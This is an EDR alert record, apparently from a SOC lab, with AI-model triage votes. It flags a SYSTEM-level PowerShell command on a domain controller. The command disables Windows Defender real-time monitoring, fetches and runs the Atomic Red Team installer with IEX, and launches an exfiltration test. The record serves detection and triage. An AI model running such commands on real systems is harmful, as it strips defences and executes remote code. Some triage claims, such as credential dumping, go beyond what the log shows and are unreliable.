{
  "author": "_soteria-rules-edr-926e2197-189b-4d89-9675-c8993933dc9a[bulk][segment]",
  "cat": "00088-WIN-Set-MpPreference_Disabled",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1567.003 -CheckPrereqs ; Invoke-AtomicTest T1567.003 -GetPrereqs ; Invoke-AtomicTest T1567.003 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 143122432,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pld368E.tmp.bat T1567.003 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4661248,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 7640,
        "THIS_ATOM": "45e4e3418a6f8c858f274b1569c2a828",
        "THREADS": 3,
        "TIMESTAMP": 1774364711483,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 7640,
      "PROCESS_ID": 3268,
      "THREADS": 33,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "db1e086f-3311-40f1-a0bf-1eded3473d79",
      "event_time": 1774364713278,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 3047,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "45e4e3418a6f8c858f274b1569c2a828",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "59a8d473d7fb33057005984369c2a82b"
    }
  },
  "detect_id": "390eb0c7-5905-4e2b-9785-943369c2a82c",
  "detect_mtd": {
    "description": "Set-MpPreference is a powershell commandlet that configures preferences for Windows Defender scans and updates. This detector looks for Set-MpPreference commandlet supplied with the disable flag.",
    "falsepositives": [
      "This should always be considered suspicious as this is indicating an attempt to disable the AV on the system in question."
    ],
    "references": [
      "https://meterpreter.org/the-latest-trickbot-variant-with-stealthy-code-injection-trick-appear/",
      "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/"
    ],
    "tags": [
      "attack.t1562.001",
      "attack.t1059.001"
    ]
  },
  "gen_time": 1774364716326,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364713\u0026selected=59a8d473d7fb33057005984369c2a82b",
  "namespace": "general",
  "priority": 3,
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "db1e086f-3311-40f1-a0bf-1eded3473d79",
    "event_time": 1774364713278,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 3047,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "45e4e3418a6f8c858f274b1569c2a828",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "59a8d473d7fb33057005984369c2a82b"
  },
  "rule_tags": [
    "ext:soteria-rules-edr",
    "attack.t1059.001",
    "attack.t1562.001"
  ],
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "service.WIN-Set-MpPreference_Disabled",
  "ts": 1774364716000
}

{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}

{
  "confidence": 0.883,
  "false_positive_reason": null,
  "investigation_questions": [
    "Was this test part of a scheduled security exercise?",
    "Which user account initiated the execution of the ART wrapper batch script?",
    "Are there other systems in the environment where similar ART tests were executed simultaneously?"
  ],
  "ioc_analysis": "The process C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe is a legitimate system binary but was used to execute a command that explicitly disables Windows Defender (Set-MpPreference -DisableRealtimeMonitoring $true) and downloads the Atomic Red Team installation script from a known GitHub repository. The parent process cmd.exe was executing a temporary batch file (pld368E.tmp.bat) from C:\\Windows\\TEMP\\, which is consistent with automated testing frameworks or remote execution.",
  "iocs_extracted": [
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1",
    "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
    "C:\\Windows\\TEMP\\pld368E.tmp.bat"
  ],
  "mitre_techniques": [
    "T1562.001",
    "T1059.001",
    "T1567.003",
    "T1003.004"
  ],
  "recommended_actions": [
    "Manual analyst review required \u2014 AI models (majority)",
    "Verify with the security team if Atomic Red Team testing was authorized on df-labsdc01.dflabs.local",
    "Ensure Windows Defender real-time monitoring is re-enabled after testing is complete",
    "Investigate the origin of the initial batch file in C:\\Windows\\TEMP to ensure the testing framework was deployed through authorized channels",
    "Review audit logs for any unauthorized access to the Domain Controller during the test window"
  ],
  "risk_score": 88,
  "severity": "high",
  "summary": "**Vote: MAJORITY (2/3 -\u003e TRUE POSITIVE)**\n\n### \u264a gemini-cli Analysis (Primary)\n**Verdict:** true_positive | **Confidence:** 1.0\nConfirmed execution of Atomic Red Team (ART) simulation tests on a Domain Controller. The activity involves disabling Windows Defender real-time monitoring (T1562.001) followed by a series of adversarial technique simulations including exfiltration to cloud storage (T1567.003) and credential dumping.\n\n**IOC Analysis:** The process C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe is a legitimate system binary but was used to execute a command that explicitly disables Windows Defender (Set-MpPreference -DisableRealtimeMonitoring $true) and downloads the Atomic Red Team installation script from a known GitHub repository. The parent process cmd.exe was executing a temporary batch file (pld368E.tmp.bat) from C:\\Windows\\TEMP\\, which is consistent with automated testing frameworks or remote execution.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThe detection correctly identifies a malicious PowerShell script executing under SYSTEM privileges to disable real-time monitoring and deploy the Atomic Red Team framework. The command line explicitly includes IEX (Invoke-Expression) with an external URL, which is a definitive indicator of remote code execution.\n\n**IOC Analysis:** The process is running legitimate WindowsPowerShell.exe from System32, but the command line arguments reveal malicious intent: disabling real-time monitoring (Set-MpPreference), using Invoke-Expression to fetch and execute remote scripts (IEX with GitHub URL), and deploying offensive tools (Atomic Red Team). The use of IEX combined with external URLs is a classic C2 beacon pattern.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.7\nThe detection involves a legitimate PowerShell process from C:\\Windows\\System32 executing commands to disable Windows Defender real-time monitoring and download tools from GitHub, indicating suspicious activity despite the process being a known system binary.\n\n**IOC Analysis:** The FILE_PATH is C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe, which is a known legitimate system binary running from its expected directory. However, the command line includes malicious actions such as setting execution policy to unrestricted, disabling real-time monitoring, and downloading scripts from external sources, suggesting the process is being exploited for unauthorized purposes.",
  "verdict": "true_positive",
  "voting": {
    "auto_action": "manual_review",
    "mode": "majority",
    "total_models": 3,
    "vote_summary": [
      "gemini-cli: true_positive (high, 100% confidence)",
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: suspicious (high, 70% confidence)"
    ],
    "votes": [
      {
        "confidence": 1.0,
        "model": "gemini-cli",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.7,
        "model": "deepseek-r1:8b",
        "verdict": "suspicious"
      }
    ],
    "winning_count": 2,
    "winning_verdict": "true_positive"
  }
}